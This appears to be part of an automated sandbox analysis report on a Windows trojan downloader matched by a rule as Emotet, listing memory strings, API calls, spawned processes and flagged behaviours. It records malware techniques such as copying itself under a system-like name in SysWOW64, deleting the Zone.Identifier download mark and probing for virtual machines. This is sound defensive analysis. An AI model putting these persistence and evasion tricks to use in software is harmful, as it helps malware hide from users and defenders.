Source: svchost.exe, 00000008.00000003.303282922.000001EAE464B000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.303312796.000001EAE4646000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.303312796.000001EAE4646000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.303856858.000001EAE4664000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000F.00000003.388870530.0000015B9697C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388898954.0000015B9695B000.00000004.00000001.sdmp String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.303564842.000001EAE4613000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.303331047.000001EAE4645000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.303331047.000001EAE4645000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000002.303583815.000001EAE4624000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000F.00000003.388870530.0000015B9697C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388898954.0000015B9695B000.00000004.00000001.sdmp String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 0000000F.00000003.388870530.0000015B9697C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388898954.0000015B9695B000.00000004.00000001.sdmp String found in binary or memory: https://www.pango.co/privacy
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004346DE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_004346DE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004229A4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_004229A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00431A6D ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_00431A6D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0041FD16 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,0_2_0041FD16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00435F74 GetKeyState,GetKeyState,GetKeyState,0_2_00435F74
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004346DE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_004346DE
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004229A4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_004229A4
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00431A6D ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_00431A6D
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0041FD16 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,1_2_0041FD16
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00435F74 GetKeyState,GetKeyState,GetKeyState,1_2_00435F74

          E-Banking Fraud:

          Yara detected Emotet
          Source: Yara match | File source: 00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.226321958.0000000002270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.226329464.0000000002281000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.488556425.0000000000711000.00000020.00000001.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File created: C:\Windows\SysWOW64\TaskSchdPS\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File deleted: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe:Zone.Identifier
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00416E84
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004133EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00423CA4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0040FF57
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00416E84
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_004133EC
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00423CA4
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_0040FF57
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: String function: 00414410 appears 47 times
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: String function: 00413794 appears 200 times
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: String function: 0042534F appears 35 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: String function: 00414410 appears 47 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: String function: 00413794 appears 200 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: String function: 0042534F appears 35 times
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000000.223674726.0000000000454000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDriveBrowsingTree.EXE\ vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000002.227052644.0000000002E30000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000002.227052644.0000000002E30000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe, 00000000.00000002.226854095.0000000002D30000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Binary or memory string: OriginalFilenameDriveBrowsingTree.EXE\ vs SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe
          Source: classification engine | Classification label: mal76.troj.evad.winEXE@15/5@0/4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0042A5C5 __EH_prolog,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00407CD0 LoadLibraryExA,LoadLibraryExA,SizeofResource,LoadLibraryExA,GetCurrentProcess,VirtualAllocExNuma
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4876:120:WilError_01
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
          Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Process created: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe
          Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_CURSOR
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_BITMAP
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_ICON
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_MENU
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_DIALOG
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_STRING
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_ACCELERATOR
          Source: SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Static PE information: section name: RT_GROUP_ICON
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004288FB __EH_prolog,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0041444B push ecx; ret 0_2_0041445B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00413020 push eax; ret 0_2_00413034
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00413020 push eax; ret 0_2_0041305C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00413794 push eax; ret 0_2_004137B2
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_0041444B push ecx; ret 1_2_0041445B
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00413020 push eax; ret 1_2_00413034
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00413020 push eax; ret 1_2_0041305C
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00413794 push eax; ret 1_2_004137B2

          Persistence and Installation Behavior:

          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Executable created and started: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | PE file moved: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File opened: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004302E7 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004347C2 IsWindowVisible,IsIconic
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00408E23 IsIconic,GetWindowPlacement,GetWindowRect
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0042977B GetParent,GetParent,IsIconic,GetParent
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_004302E7 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_004347C2 IsWindowVisible,IsIconic
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00408E23 IsIconic,GetWindowPlacement,GetWindowRect
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_0042977B GetParent,GetParent,IsIconic,GetParent
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\svchost.exe TID: 2040 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6180 | Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00428B68 lstrlenA,FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00401640 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_022828B7 FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00428B68 lstrlenA,FindFirstFileA,FindClose
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00401640 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00413306 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect
          Source: svchost.exe, 00000004.00000002.491577214.000002935E262000.00000004.00000001.sdmp | Binary or memory string: "@Hyper-V RAW
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWP
          Source: bcryptprimitives.exe, 00000001.00000002.488644506.0000000000774000.00000004.00000020.sdmp, svchost.exe, 00000004.00000002.491548254.000002935E255000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.400900703.0000015B960D6000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: svchost.exe, 00000007.00000002.488446089.000001BA1B029000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000005.00000002.278763826.0000027C13D40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.365758268.00000203C40B0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.401599018.0000015B97000000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004288FB __EH_prolog,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_02272690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_02270467 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_02272F70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_02283631 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_02282D51 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004164EA SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_004164FE SetUnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_004164EA SetUnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_004164FE SetUnhandledExceptionFilter
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: bcryptprimitives.exe, 00000001.00000002.488917746.0000000000CC0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.488428904.000002813C060000.00000002.00000001.sdmp | Binary or memory string: Program Manager[
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_0041C708 GetLocaleInfoA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00401070 GetThreadLocale,GetLocaleInfoA,GetACP
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exe | Code function: 0_2_00437103 lstrcpyA,LoadLibraryA,GetLocaleInfoA
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_0041C708 GetLocaleInfoA
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00401070 GetThreadLocale,GetLocaleInfoA,GetACP
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Code function: 1_2_00437103 lstrcpyA,LoadLibraryA,GetLocaleInfoA
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
